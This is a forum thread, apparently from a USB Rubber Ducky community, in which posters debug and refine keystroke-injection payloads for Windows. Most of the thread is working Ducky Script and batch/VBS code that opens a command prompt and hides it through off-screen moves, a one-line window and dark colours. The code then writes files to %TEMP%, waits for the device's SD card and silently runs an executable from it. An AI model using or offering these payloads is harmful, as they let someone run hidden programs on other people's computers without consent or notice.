Jump to content

Looking at the for loops again


Recommended Posts

So, It has come to my attention that some of the payloads have a flaw in their processing, whereby the ducky drive finding code will not run correctly if it is not on an admin machine. I have known for a while, but haven't found a way to fix it. The other day I found out about the "vol" command in batch. So if any of you are knowledgable in batch, I have at least one question, does the "vol" command work on more than one platform, ex windows 7, xp, vista etc.

If it does we can retool the code to use "vol" instead of diskpart which has a crippling error when running on non admin computers. Here is some code I have been working on, executes in the command prompt, not a batch file yet. It doesn't work right yet, I am having trouble with the DuckyDrive variable not setting. If any of you know how to fix this, then please post.

for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( for /f "tokens=6 delims= " %i in ('Vol %d:') do if %i NEQ "Drive" if %i EQU "DUCKY" echo set DuckyDrive=%d: )
Edited by overwraith
Link to post
Share on other sites

It's not done yet, it is still erroring somewhere. I gotta try to figure out why the set command isn't working. I know the vol command is present on my computer, Windows 7, but it is reassuring to hear that it has been around since DOS.

Link to post
Share on other sites

I figured it out, needed quotes in the 'if' statement first parameter. I swear, somebody needs to send me a few batch books, it is difficult gleaning a comprehensive cirriculum from just online web pages and snippets. Also factor in that this stuff was pretty much before my time.

for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( for /f "tokens=6 delims= " %i in ('Vol %d:') do (if "%i" EQU "DUCKY" set DuckyDrive=%d: ))

This should be the new RunEXE from SD payload, but I haven't got a chance to test it yet, am downloading something, and apparently every time I plug in the ducky to this expansion USB/SD card slot in the front of my computer it drops all currently connected USB devices. Wierd. I need this external hard drive connected during the download.

REM Author: overwraith
REM Name: RunEXE_V3.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different verison of the drive finder code.
REM Encoder V2.4+
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do (
ENTER
STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
ENTER
STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
ENTER
STRING )
ENTER
STRING )
ENTER
STRING if Exist %DuckyDrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %DuckyDrive%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER
Edited by overwraith
Link to post
Share on other sites
  • 2 weeks later...

Personally, I would do something like this, to avoid having to loop through each drive letter:

for /f "tokens=3" %v in ('ver') do if %v==XP (for /f "tokens=3" %a in ('echo list volume ^| diskpart ^| find "Volume" ^| find "RUN"') do start "" %a:\run.exe) else (for /f %a in ('wmic logicaldisk get volumename^,name ^| find "RUN"') do start "" %a\run.exe)

Works on Windows XP using diskpart as well as Vista+ using wmic.

Link to post
Share on other sites

Yes, except if you are non admin, or guest, which will make a diskpart black box pop up, derailing the script. There was a reason I was exploring alternate routes. Also, ducks used to be a lot slower than they are now, I would have to test if it automatically mounts the SD immediately.

Edited by overwraith
Link to post
Share on other sites

If you look, it actually only uses diskpart on XP (as XP home doesn't have access to the WMI console). Everything else is all just done in one command. If you were to run CMD and have the above run via the command line directly, the box would be visible only for the amount of time necessary to either query diskpart or WMIC (a few seconds at most).

Ducks only seem to mount the FS slowly the first time it is plugged into a computer, making testing timings difficult. I've got a work-in-progress using VBS to loop in the background waiting for the drive to load, which means that timing wouldn't ever be an issue. In the mean time, I would suggest that instead of using

cmd /Q /D /T:7F /F:OFF /V:ON /K
you could try changing the colour setting to something with two dark settings, like 01 (if my memory serves that's dark blue on black background). You could also try reducing the console size to the bare minimum (1 line and somewhere between 10-18 columns, I can never remember).

cmd /Q /D /T:01 /F:OFF /V:ON /K mode con cols=18 lines=1
Please forgive any mistakes. I'm on mobile right now, so I can't exactly test the syntax of the mode command.
Link to post
Share on other sites

Here's the VBS code I've been working on, along with the modified CMD string.

REM DEFAULT_DELAY 20
DELAY 2000
GUI r
DELAY 100
STRING cmd /T:01 /K mode con cols=15 lines=1©/y con %tmp%\z.vbs
ENTER
DELAY 300
STRING on error resume next:Set s = GetObject("winmgmts:"):d="":do while d=""
ENTER
STRING Set c = s.ExecQuery("Select * from Win32_Volume Where Label='DUCKY'"):set o=c.ItemIndex(0):d=o.Name
ENTER
STRING if d="" then wscript.sleep 500
ENTER
STRING loop
ENTER
STRING Set w = WScript.CreateObject("WScript.Shell"):w.Run d&"\r.bat", 1 , false
ENTER
DELAY 10
CTRL z
ENTER
DELAY 50
STRING start "" %tmp%\z.vbs&exit
ENTER
Link to post
Share on other sites

Here's the VBS code I've been working on, along with the modified CMD string.

REM DEFAULT_DELAY 20
DELAY 2000
GUI r
DELAY 100
STRING cmd /T:01 /K mode con cols=15 lines=1©/y con %tmp%\z.vbs
ENTER
DELAY 300
STRING on error resume next:Set s = GetObject("winmgmts:"):d="":do while d=""
ENTER
STRING Set c = s.ExecQuery("Select * from Win32_Volume Where Label='DUCKY'"):set o=c.ItemIndex(0):d=o.Name
ENTER
STRING if d="" then wscript.sleep 500
ENTER
STRING loop
ENTER
STRING Set w = WScript.CreateObject("WScript.Shell"):w.Run d&"\r.bat", 1 , false
ENTER
DELAY 10
CTRL z
ENTER
DELAY 50
STRING start "" %tmp%\z.vbs&exit
ENTER

Weird, it didn't include everything I typed after the code. I really can't be bothered to type out all that again, but I'll summarize.

Some CMD switches don't do much or nothing at all. I've included only the ones necessary.

Making the window smaller using mode instead of moving it is probably less noticeable. Moving to the left is better than down, as the window generally spawns in upper-left side of screen.

VBS code runs silent, loops until it finds the drive named "DUCKY".

90% certain VBS code will work on all XP versions and above. If it won't work on something, it'll be XP Home.

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...